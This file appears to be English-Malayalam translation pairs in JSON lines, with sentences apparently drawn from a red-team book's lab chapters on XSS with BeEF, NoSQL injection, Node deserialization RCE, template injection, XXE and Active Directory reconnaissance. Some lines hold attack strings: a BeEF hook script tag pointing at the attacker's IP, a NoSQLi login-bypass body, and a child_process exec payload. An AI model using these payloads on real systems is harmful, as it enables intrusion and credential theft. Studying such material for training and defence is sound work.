| {"en":"These types of attacks make Polyglots extremely effective and efficient at identifying XSS.","translation":"ഇത്തരം ആക്രമണങ്ങൾ XSS തിരിച്ചറിയുന്നതിൽ പോളിഗ്ലോട്ടുകളെ വളരെ ഫലപ്രദവും കാര്യക്ഷമവുമാക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"If you want to test and play around with the different polyglots, you can start here on the vulnerable XSS pages (http://chat:3000/xss) or throughout the Chat Application.","translation":"വിവിധ പോളിഗ്ലോട്ടുകൾ പരീക്ഷിച്ച് കളിക്കാൻ ആഗ്രഹിക്കുന്നുവെങ്കിൽ, നിങ്ങൾക്ക് ഇവിടെ XSS പേജുകളിൽ (http://chat:3000/xss) അല്ലെങ്കിൽ ചാറ്റ് ആപ്ലിക്കേഷനിൽ ആരംഭിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"BeEF Browser Exploitation Framework (http://beefproject.com/) or BeEF, takes XSS to another level.","translation":"BeEF ബ്രൗസർ എക്സ്പ്ലോയിറ്റേഷൻ ഫ്രെയിംവർക്ക് (http://beefproject.com/) അഥവാ BeEF, XSS-നെ മറ്റൊരു തലത്തിലേക്ക് കൊണ്ടുപോകുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"This tool injects a JavaScript payload onto the victim’s browser, which infects the user’s system.","translation":"ഈ ഉപകരണം ഇരയുടെ ബ്രൗസറിലേക്ക് ഒരു JavaScript പേലോഡ് കുത്തിവയ്ക്കുന്നു, ഇത് ഉപയോക്താവിൻ്റെ സിസ്റ്റത്തിലേക്ക് പ്രവേശിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"From a Red Team perspective, BeEF is a great tool to use on campaigns, track users, capture credentials, perform clickjacking, attack with tabnapping and more.","translation":"ഒരു റെഡ് ടീം വീക്ഷണകോണിൽ നിന്ന്, കാമ്പെയ്നുകളിൽ ഉപയോഗിക്കാനും, ഉപയോക്താക്കളെ ട്രാക്ക് ചെയ്യാനും, ക്രെഡൻഷ്യലുകൾ നേടാനും, ക്ലിക്ക്ജാക്കിംഗ് നടത്താനും, ടാബ്നാപ്പിംഗ് ഉപയോഗിച്ച് ആക്രമണം നടത്താനും BeEF ഒരു മികച്ച ഉപകരണമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"To start the server: Start BeEF on Your Attacker Kali Host From a Terminal beef-xss Authenticate with beef:beef View http://127.0.0.1:3000/hook.js","translation":"സെർവർ ആരംഭിക്കാൻ: നിങ്ങളുടെ ആക്രമണകാരിയുടെ കാലി ഹോസ്റ്റിൽ BeEF ആരംഭിക്കുക. ടെർമിനലിൽ നിന്ന് beef-xss ഉപയോഗിച്ച് പ്രാമാണീകരിക്കുക: beef:beef http://127.0.0.1:3000/hook.js കാണുക","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Viewing your hook.js file located on http://127.0.0.1:3000/hook.js, you should see something that resembles a long-obfuscated JavaScript file.","translation":"http://127.0.0.1:3000/hook.js എന്നതിലുള്ള നിങ്ങളുടെ hook.js ഫയൽ കാണുമ്പോൾ, വളരെ അവ്യക്തമാക്കിയ ഒരു JavaScript ഫയലിന് സമാനമായ ഒന്ന് നിങ്ങൾ കാണും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Once you have identified an XSS on your target application, instead of the original alert(1) style payload, you would modify the <script src=\"http://<Your IP>:3000/hook.js\"></script> payload to exploit the vulnerability.","translation":"നിങ്ങളുടെ ടാർഗെറ്റ് ആപ്ലിക്കേഷനിൽ ഒരു XSS കണ്ടെത്തിയ ശേഷം, യഥാർത്ഥ alert(1) ശൈലിയിലുള്ള പേലോഡിനുപകരം, <script src=\"http://<Your IP>:3000/hook.js\"></script> പേലോഡ് ദുർബലത മുതലെടുക്കാൻ നിങ്ങൾ മാറ്റം വരുത്തണം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Once your victim falls for this XSS trap, it will cause their browser to connect back to you and be a part of your Zombie network.","translation":"നിങ്ങളുടെ ഇര ഈ XSS കെണിയിൽ വീണാൽ, അവരുടെ ബ്രൗസർ നിങ്ങളുമായി വീണ്ടും കണക്ട് ചെയ്യുകയും നിങ്ങളുടെ സോംബി നെറ്റ്വർക്കിൻ്റെ ഭാഗമാവുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"You can turn on their camera via HTLM5 and take a picture of your victim, you can push overlays on their screen to capture credentials, or you can redirect them to a malicious site to execute malware.","translation":"HTLM5 വഴി അവരുടെ ക്യാമറ ഓണാക്കാനും ഇരയുടെ ചിത്രം എടുക്കാനും, ക്രെഡൻഷ്യലുകൾ നേടുന്നതിന് അവരുടെ സ്ക്രീനിൽ ഓവർലേകൾ നൽകാനും അല്ലെങ്കിൽ ക്ഷുദ്രകരമായ സൈറ്റിലേക്ക് റീഡയറക്ട് ചെയ്ത് മാൽവെയർ പ്രവർത്തിപ്പിക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"I recommend spending some time playing around with all the BeEf post exploitation modules and understanding the power of JavaScript.","translation":"എല്ലാ BeEf പോസ്റ്റ് എക്സ്പ്ലോയിറ്റേഷൻ മൊഡ്യൂളുകളും പരീക്ഷിച്ച് JavaScript-ൻ്റെ ശക്തി മനസ്സിലാക്കാൻ കുറച്ച് സമയം ചെലവഴിക്കാൻ ഞാൻ ശുപാർശ ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Blind XSS is rarely discussed as it is a patient person's game.","translation":"ക്ഷമയുള്ളവരുടെ കളിയായതിനാൽ ബ്ലൈൻഡ് XSS-നെക്കുറിച്ച് വളരെ കുറഞ്ഞേ പറയാറുള്ളൂ.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"As the name of the attack suggests, it is when an execution of a stored XSS payload is not visible to the attacker/user, but only visible to an administrator or back-end employee.","translation":"ആക്രമണത്തിൻ്റെ പേര് സൂചിപ്പിക്കുന്നത് പോലെ, സംഭരിച്ച XSS പേലോഡിൻ്റെ എക്സിക്യൂഷൻ, ആക്രമണകാരിക്ക്/ഉപയോക്താവിന് ദൃശ്യമാകില്ല, എന്നാൽ ഒരു അഡ്മിനിസ്ട്രേറ്റർക്കോ ബാക്ക്-എൻഡ് ജീവനക്കാരനോ ദൃശ്യമാകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's see this in action: Go to http://chat:3000/nosql2","translation":"ഇത് എങ്ങനെ പ്രവർത്തിക്കുമെന്ന് നോക്കാം: http://chat:3000/nosql2 എന്നതിലേക്ക് പോവുക.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"You should be logged in with admin!","translation":"നിങ്ങൾ അഡ്മിനായി ലോഗിൻ ചെയ്യണം!","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"What if you didn't know which usernames to attack?","translation":"ഏത് ഉപയോക്തൃനാമങ്ങളാണ് ആക്രമിക്കേണ്ടതെന്ന് നിങ്ങൾക്കറിയില്ലെങ്കിൽ എന്ത് ചെയ്യും?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In this case, the NoSQLi POST request would look something like: username[$gt]=admin&password[$gt]=&submit=login","translation":"ഈ സാഹചര്യത്തിൽ, NoSQLi POST അഭ്യർത്ഥന ഇങ്ങനെയായിരിക്കും: username[$gt]=admin&password[$gt]=&submit=login","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Continue doing this until you find the superaccount.","translation":"സൂപ്പർ അക്കൗണ്ട് കണ്ടെത്തുന്നതുവരെ ഇത് തുടരുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"So what's the big deal with deserialization attacks?","translation":"അപ്പോൾ, ഡീസെറിയലൈസേഷൻ ആക്രമണങ്ങളെക്കുറിച്ച് എന്താണ് വലിയ കാര്യം?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Serialization converts objects into a stream of bytes to transfer over network or for storage.","translation":"സെറിയലൈസേഷൻ ഒബ്ജക്റ്റുകളെ നെറ്റ്വർക്കിലൂടെ കൈമാറാനോ സംഭരിക്കാനോ വേണ്ടി ബൈറ്റുകളുടെ ഒരു സ്ട്രീമാക്കി മാറ്റുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Let's walk through the details of an attack to better understand what is happening.","translation":"എന്താണ് സംഭവിക്കുന്നതെന്ന് നന്നായി മനസ്സിലാക്കാൻ ഒരു ആക്രമണത്തിന്റെ വിശദാംശങ്ങളിലൂടെ കടന്നുപോകാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Generally, allowing user input to go into a JavaScript eval statement is bad news, as eval() executes raw JavaScript.","translation":"സാധാരണയായി, ഉപയോക്തൃ ഇൻപുട്ട് ഒരു JavaScript eval സ്റ്റേറ്റ്മെന്റിലേക്ക് കടന്നുപോകാൻ അനുവദിക്കുന്നത് മോശമാണ്, കാരണം eval() റോ JavaScript പ്രവർത്തിപ്പിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"If an attacker is able to inject JavaScript into this statement, they would be able to have Remote Code Execution onto the server.","translation":"ഒരു ആക്രമണകാരിക്ക് ഈ പ്രസ്താവനയിലേക്ക് JavaScript കുത്തിവയ്ക്കാൻ കഴിയുമെങ്കിൽ, അവർക്ക് സെർവറിലേക്ക് വിദൂര കോഡ് എക്സിക്യൂഷൻ നടത്താൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"The JSON object above will pass the following request “() {require('child_process').exec('ls')” into the eval statement within the unserialize function, giving us remote code execution.","translation":"മുകളിലുള്ള JSON ഒബ്ജക്റ്റ്, unserialize ഫംഗ്ഷനുള്ളിലെ eval സ്റ്റേറ്റ്മെന്റിലേക്ക് “() {require('child_process').exec('ls')” എന്ന അഭ്യർത്ഥന നൽകും, ഇത് നമുക്ക് വിദൂര കോഡ് എക്സിക്യൂഷൻ നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"In our Chat Application example, we are going to look at the cookie value, which is being deserialized using this vulnerable library:","translation":"ഞങ്ങളുടെ ചാറ്റ് ആപ്ലിക്കേഷൻ ഉദാഹരണത്തിൽ, ഈ ദുർബലമായ ലൈബ്രറി ഉപയോഗിച്ച് ഡീസെറിയലൈസ് ചെയ്യുന്ന കുക്കി മൂല്യമാണ് നമ്മൾ നോക്കാൻ പോകുന്നത്:","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Go to http://chat:3000 Proxy the traffic in burp and look at the cookies","translation":"http://chat:3000 എന്നതിലേക്ക് പോവുക, Burp-ൽ ട്രാഫിക് പ്രോക്സി ചെയ്യുക, കുക്കികൾ പരിശോധിക്കുക","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"As previously mentioned, every language has its unique oddities and NodeJS is no different.","translation":"മുമ്പ് സൂചിപ്പിച്ചതുപോലെ, എല്ലാ ഭാഷകൾക്കും അതിൻ്റേതായ പ്രത്യേകതകളുണ്ട്, NodeJS-നും ഇത് ബാധകമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Creating the Payload Before you start, remember all these payloads for the lab are in an easy to copy-and-paste format listed here: http://bit.ly/2qBDrFo","translation":"പേലോഡ് ഉണ്ടാക്കുന്നു: നിങ്ങൾ ആരംഭിക്കുന്നതിന് മുമ്പ്, ഈ ലാബിനായുള്ള എല്ലാ പേലോഡുകളും ഇവിടെ നൽകിയിട്ടുള്ള എളുപ്പത്തിൽ പകർത്തി ഒട്ടിക്കാവുന്ന ഫോർമാറ്റിൽ ആണെന്ന് ഓർക്കുക: http://bit.ly/2qBDrFo","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Take the original payload and modify your shell execution","translation":"യഥാർത്ഥ പേലോഡ് എടുത്ത് നിങ്ങളുടെ ഷെൽ എക്സിക്യൂഷൻ പരിഷ്കരിക്കുക","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"You now have Remote Code Execution!","translation":"നിങ്ങൾക്ക് ഇപ്പോൾ വിദൂര കോഡ് എക്സിക്യൂഷൻ ഉണ്ട്!","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Template engines are being used more often due to their modularity and succinct code compared with standard HTML.","translation":"സാധാരണ HTML-മായി താരതമ്യം ചെയ്യുമ്പോൾ, മൊഡ്യൂലാരിറ്റിയും ചുരുങ്ങിയ കോഡുമുള്ളതിനാൽ ടെംപ്ലേറ്റ് എഞ്ചിനുകൾ ഇപ്പോൾ കൂടുതലായി ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In our next example, you will be performing Template Injection attacks on our NodeJS application via Pug.","translation":"അടുത്ത ഉദാഹരണത്തിൽ, നിങ്ങൾ Pug വഴി ഞങ്ങളുടെ NodeJS ആപ്ലിക്കേഷനിൽ ടെംപ്ലേറ്റ് ഇൻജക്ഷൻ ആക്രമണങ്ങൾ നടത്തും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"This shows the application is vulnerable to XSS, but can we interact with the templating system?","translation":"ആപ്ലിക്കേഷൻ XSS-ന് ഇരയാകുമിത് കാണിക്കുന്നു, എന്നാൽ നമുക്ക് ടെംപ്ലേറ്റിംഗ് സിസ്റ്റവുമായി സംവദിക്കാൻ കഴിയുമോ?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Intercept traffic and hit \"Hack the XML\".","translation":"\"Hack the XML\" ക്ലിക്കുചെയ്ത് ട്രാഫിക് തടയുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In this example, we specified that it is XML version 1.0, DOCTYPE, specified the root element is thp, !ELEMENT specifies ANY type, and !ENTITY sets the book to the string \"Universe\".","translation":"ഈ ഉദാഹരണത്തിൽ, ഇത് XML പതിപ്പ് 1.0 ആണെന്നും, DOCTYPE ആണെന്നും, റൂട്ട് എലമെന്റ് thp ആണെന്നും, !ELEMENT ഏതെങ്കിലും തരത്തിലുള്ളതാണെന്നും, !ENTITY പുസ്തകത്തെ \"Universe\" എന്ന സ്ട്രിംഗിലേക്ക് സജ്ജമാക്കുന്നു എന്നും ഞങ്ങൾ വ്യക്തമാക്കിയിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Since we control the POST data that has the XML request, we can try to inject our own malicious entities.","translation":"XML അഭ്യർത്ഥനയുള്ള POST ഡാറ്റ ഞങ്ങൾ നിയന്ത്രിക്കുന്നതിനാൽ, ഞങ്ങളുടെ സ്വന്തം ദോഷകരമായ എൻ്റിറ്റികൾ കുത്തിവയ്ക്കാൻ ശ്രമിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"By default, most XML parsing libraries support the SYSTEM keyword that allows data to be read from a URI.","translation":"സ്വതവേ, മിക്ക XML പാഴ്സിംഗ് ലൈബ്രറികളും ഒരു URI-യിൽ നിന്ന് ഡാറ്റ വായിക്കാൻ അനുവദിക്കുന്ന SYSTEM കീവേഡിനെ പിന്തുണയ്ക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Send the intercepted traffic to Repeater.","translation":"തടഞ്ഞ ട്രാഫിക്, Repeater-ലേക്ക് അയക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Modify the \"data\" POST parameter to the following.","translation":"ഇനി പറയുന്ന രീതിയിൽ \"data\" POST പാരാമീറ്റർ മാറ്റുക.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We will need to percent encode the ampersand and semicolon character.","translation":"ആംപേഴ്സാൻ്റും അർദ്ധവിരാമ ചിഹ്നവും ശതമാനം എൻകോഡ് ചെയ്യേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Submit the traffic and we should be able to read /etc/passwd.","translation":"ട്രാഫിക് സമർപ്പിക്കുക, കൂടാതെ /etc/passwd വായിക്കാൻ കഴിയണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In the previous attack, we were able to get the response back in the <thp> tags.","translation":"മുമ്പത്തെ ആക്രമണത്തിൽ, <thp> ടാഗുകളിൽ പ്രതികരണം തിരികെ ലഭിക്കാൻ ഞങ്ങൾക്ക് കഴിഞ്ഞു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"What if we couldn’t see the response or ran into character/file restrictions?","translation":"പ്രതികരണം കാണാൻ കഴിഞ്ഞില്ലെങ്കിലോ അല്ലെങ്കിൽ പ്രതീക/ഫയൽ നിയന്ത്രണങ്ങൾ നേരിടേണ്ടി വന്നാലോ എന്ത് ചെയ്യും?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Instead of defining our attack in the request payload, we can supply a remote Document Type Definition (DTD) file.","translation":"അഭ്യർത്ഥന പേലോഡിൽ ഞങ്ങളുടെ ആക്രമണം നിർവചിക്കുന്നതിനുപകരം, ഒരു വിദൂര ഡോക്യുമെൻ്റ് ടൈപ്പ് ഡെഫനിഷൻ (DTD) ഫയൽ നൽകാം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"A DTD is a well-structured XML file that defines the structure and the legal elements and attributes of an XML document.","translation":"ഒരു DTD എന്നത് നന്നായി ഘടന നൽകിയിട്ടുള്ള ഒരു XML ഫയലാണ്, ഇത് ഒരു XML ഡോക്യുമെൻ്റിൻ്റെ ഘടനയും നിയമപരമായ ഘടകങ്ങളും ആട്രിബ്യൂട്ടുകളും നിർവചിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"For sake of ease, our DTD will contain all of our attack/exfil payloads.","translation":"എളുപ്പത്തിനായി, ഞങ്ങളുടെ DTD-യിൽ ഞങ്ങളുടെ എല്ലാ ആക്രമണ/എക്സ്ഫിൽ പേലോഡുകളും അടങ്ങിയിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Our new XXE attack will be performed in four stages.","translation":"ഞങ്ങളുടെ പുതിയ XXE ആക്രമണം നാല് ഘട്ടങ്ങളായി നടത്തും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We are going to need to host this payload on our attacker server by creating a file called payload.dtd.","translation":"payload.dtd എന്ന ഫയൽ ഉണ്ടാക്കി, ഇത് ഞങ്ങളുടെ ആക്രമണകാരിയുടെ സെർവറിൽ ഹോസ്റ്റ് ചെയ്യേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Once we repeat our newly modified request, we can now see that our victim server first grabs the payload.dtd file.","translation":"ഞങ്ങൾ പുതുതായി പരിഷ്കരിച്ച അഭ്യർത്ഥന ആവർത്തിക്കുമ്പോൾ, ഞങ്ങളുടെ ഇരയുടെ സെർവർ ആദ്യം payload.dtd ഫയൽ എടുക്കുന്നത് ഇപ്പോൾ കാണാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Although this is only a small glimpse of all the different web attacks you may encounter, the hope was to open your eyes to how these newer frameworks are introducing old and new attacks.","translation":"നിങ്ങൾ കണ്ടുമുട്ടാൻ സാധ്യതയുള്ള വ്യത്യസ്ത വെബ് ആക്രമണങ്ങളെക്കുറിച്ചുള്ള ഒരു ചെറിയ വിവരണം മാത്രമാണിത്, പഴയതും പുതിയതുമായ ആക്രമണങ്ങൾ എങ്ങനെയാണ് ഈ പുതിയ ഫ്രെയിംവർക്കുകൾ അവതരിപ്പിക്കുന്നത് എന്ന് നിങ്ങൾക്ക് മനസ്സിലാക്കാൻ ഇത് സഹായകമാകും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"On day two of your assessment, you ran nmap on the whole network, kicked off vulnerability scanners with no luck, and were not able to identify an initial entry point on any of their web applications.","translation":"നിങ്ങളുടെ വിലയിരുത്തലിൻ്റെ രണ്ടാം ദിവസം, നിങ്ങൾ മുഴുവൻ നെറ്റ്വർക്കിലും nmap പ്രവർത്തിപ്പിച്ചു, ഭാഗ്യമില്ലാതെ വൾനറബിലിറ്റി സ്കാനറുകൾ ആരംഭിച്ചു, അവരുടെ വെബ് ആപ്ലിക്കേഷനുകളിൽ പ്രാരംഭ എൻട്രി പോയിൻ്റ് തിരിച്ചറിയാൻ കഴിഞ്ഞില്ല.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"In this chapter, you will be concentrating on Red Team tactics, abusing the corporate infrastructure, getting credentials, learning about the internal network, and pivoting between hosts and networks.","translation":"ഈ അധ്യായത്തിൽ, നിങ്ങൾ റെഡ് ടീം തന്ത്രങ്ങൾ, കോർപ്പറേറ്റ് ഇൻഫ്രാസ്ട്രക്ചർ ദുരുപയോഗം ചെയ്യുക, ക്രെഡൻഷ്യലുകൾ നേടുക, ആന്തരിക നെറ്റ്വർക്കിനെക്കുറിച്ച് പഠിക്കുക, ഹോസ്റ്റുകൾക്കും നെറ്റ്വർക്കുകൾക്കും ഇടയിൽ വിവരങ്ങൾ കൈമാറുക എന്നിവയിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As companies grow, they require more technologies and tools.","translation":"കമ്പനികൾ വളരുമ്പോൾ, അവർക്ക് കൂടുതൽ സാങ്കേതികവിദ്യകളും ഉപകരണങ്ങളും ആവശ്യമാണ്.","target_lang":"ml","domain":"general","complexity":"simple"} | |
| {"en":"PowerShell tool to gain network situational awareness on Windows domains.","translation":"വിൻഡോസ് ഡൊമെയ്നുകളിൽ നെറ്റ്വർക്ക് സ്ഥിതിവിവരങ്ങൾ നേടുന്നതിനുള്ള ഒരു പവർഷെൽ ഉപകരണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As an attacker, we can leverage PowerView and PowerShell to query AD.","translation":"ഒരു ആക്രമണകാരിയെന്ന നിലയിൽ, AD-യിൽ ചോദ്യം ചെയ്യുന്നതിന് നമുക്ക് PowerView-ഉം PowerShell-ഉം ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's walk through an example of how much data we can get with this low-level user.","translation":"ഈ താഴ്ന്ന നിലയിലുള്ള ഉപയോക്താവിനെ ഉപയോഗിച്ച് എത്ര ഡാറ്റ നേടാനാകുമെന്ന് നമുക്ക് ഒരു ഉദാഹരണത്തിലൂടെ നോക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Once we have our agent communicating with our Command and Control server, we can type \"info\" to find out information about our victim.","translation":"ഞങ്ങളുടെ കമാൻഡ് ആൻഡ് കൺട്രോൾ സെർവറുമായി ഞങ്ങളുടെ ഏജന്റ് ആശയവിനിമയം നടത്തിക്കഴിഞ്ഞാൽ, ഇരയെക്കുറിച്ചുള്ള വിവരങ്ങൾ കണ്ടെത്താൻ നമുക്ക് \"info\" എന്ന് ടൈപ്പ് ചെയ്യാം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"PowerView queries the Domain Controller (DC) to get information on users, groups, computers, and more.","translation":"ഉപയോക്താക്കൾ, ഗ്രൂപ്പുകൾ, കമ്പ്യൂട്ടറുകൾ എന്നിവയെക്കുറിച്ചും അതിലധികവും വിവരങ്ങൾ ലഭിക്കുന്നതിന് PowerView, ഡൊമെയ്ൻ കൺട്രോളറിനെ (DC) ചോദ്യം ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can start with the PowerView script called get_user.","translation":"get_user എന്ന് പേരുള്ള PowerView സ്ക്രിപ്റ്റ് ഉപയോഗിച്ച് നമുക്ക് ആരംഭിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Get_user queries information for a given user or users in the specified domain.","translation":"നൽകിയിട്ടുള്ള ഡൊമെയ്നിലെ ഒരു ഉപയോക്താവിനോ ഉപയോക്താക്കൾക്കോ വേണ്ടിയുള്ള വിവരങ്ങൾ get_user ചോദ്യം ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can see their samaccountname or username, when their password was changed, what their object category is, what membersof they are part of, last login, and more.","translation":"അവരുടെ samaccountname അല്ലെങ്കിൽ ഉപയോക്തൃനാമം, പാസ്വേഡ് എപ്പോൾ മാറ്റി, അവരുടെ ഒബ്ജക്റ്റ് വിഭാഗം എന്താണ്, അവർ എന്തിൻ്റെ ഭാഗമാണ്, അവസാന ലോഗിൻ തുടങ്ങിയവ നമുക്ക് കാണാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Get_group_member returns the members of a given group, with the option to \"Recurse\" to find all effective group members.","translation":"നൽകിയിട്ടുള്ള ഗ്രൂപ്പിലെ അംഗങ്ങളെ Get_group_member നൽകുന്നു, എല്ലാ ഫലപ്രദമായ ഗ്രൂപ്പ് അംഗങ്ങളെയും കണ്ടെത്താൻ \"Recurse\" എന്ന ഓപ്ഷനോടൊപ്പം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can use AD to find specific users of certain groups.","translation":"ചില ഗ്രൂപ്പുകളിലെ പ്രത്യേക ഉപയോക്താക്കളെ കണ്ടെത്താൻ നമുക്ക് AD ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This will help us map which users have which privileges.","translation":"ഏത് ഉപയോക്താക്കൾക്കാണ് ഏതൊക്കെ പ്രത്യേകാവകാശങ്ങൾ ഉള്ളതെന്ന് ഇത് നമ്മെ സഹായിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We can get this information on a module called get_computer.","translation":"get_computer എന്ന് പേരുള്ള ഒരു മൊഡ്യൂളിൽ ഈ വിവരങ്ങൾ നമുക്ക് ലഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"As an attacker, one of the most helpful recon details is obtaining operating system types and operating system versions.","translation":"ഒരു ആക്രമണകാരിയെന്ന നിലയിൽ, ഏറ്റവും സഹായകമായ വിവരങ്ങളിലൊന്ന്, ഓപ്പറേറ്റിംഗ് സിസ്റ്റം തരങ്ങളും ഓപ്പറേറ്റിംഗ് സിസ്റ്റം പതിപ്പുകളും നേടുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Bloodhound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.","translation":"ഒരു Active Directory പരിതസ്ഥിതിയിലെ മറഞ്ഞിരിക്കുന്നതും പലപ്പോഴും ഉദ്ദേശിക്കാത്തതുമായ ബന്ധങ്ങൾ വെളിപ്പെടുത്താൻ Bloodhound ഗ്രാഫ് സിദ്ധാന്തം ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Bloodhound works by running an Ingestor on a victim system, and then queries AD.","translation":"ഒരു ഇരയുടെ സിസ്റ്റത്തിൽ ഒരു ഇൻജെസ്റ്റർ പ്രവർത്തിപ്പിച്ച് Bloodhound പ്രവർത്തിക്കുന്നു, തുടർന്ന് AD-യെ ചോദ്യം ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"For a medium-large sized organization on the default setting (which can be modified), it can take less than 10 minutes to connect to every host system and query information using Sharphound.","translation":"സ്ഥിരസ്ഥിതി ക്രമീകരണങ്ങളുള്ള ഒരു ഇടത്തരം-വലിയ ഓർഗനൈസേഷനായി (ഇത് മാറ്റാൻ കഴിയും), എല്ലാ ഹോസ്റ്റ് സിസ്റ്റങ്ങളിലേക്കും കണക്ട് ചെയ്യാനും Sharphound ഉപയോഗിച്ച് വിവരങ്ങൾ ചോദ്യം ചെയ്യാനും 10 മിനിറ്റിൽ താഴെ സമയം മതി.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Sharphound is the C# version of the original Bloodhound Ingester.","translation":"Sharphound യഥാർത്ഥ Bloodhound Ingester-ൻ്റെ C# പതിപ്പാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"To run the Bloodhound/Sharphound Ingestor, there are multiple CollectionMethods you might need to specify.","translation":"Bloodhound/Sharphound Ingestor പ്രവർത്തിപ്പിക്കുന്നതിന്, നിങ്ങൾ വ്യക്തമാക്കേണ്ട ഒന്നിലധികം CollectionMethods ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Once Bloundhound/Sharphound is finished, four files will be dropped onto the victim system.","translation":"Bloundhound/Sharphound പൂർത്തിയായാൽ, നാല് ഫയലുകൾ ഇരയുടെ സിസ്റ്റത്തിൽ ഡ്രോപ്പ് ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can now click on \"Find Shortest Path from owned node to Domain Admin\".","translation":"ഇപ്പോൾ നമുക്ക് \"Find Shortest Path from owned node to Domain Admin\" എന്നതിൽ ക്ലിക്ക് ചെയ്യാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
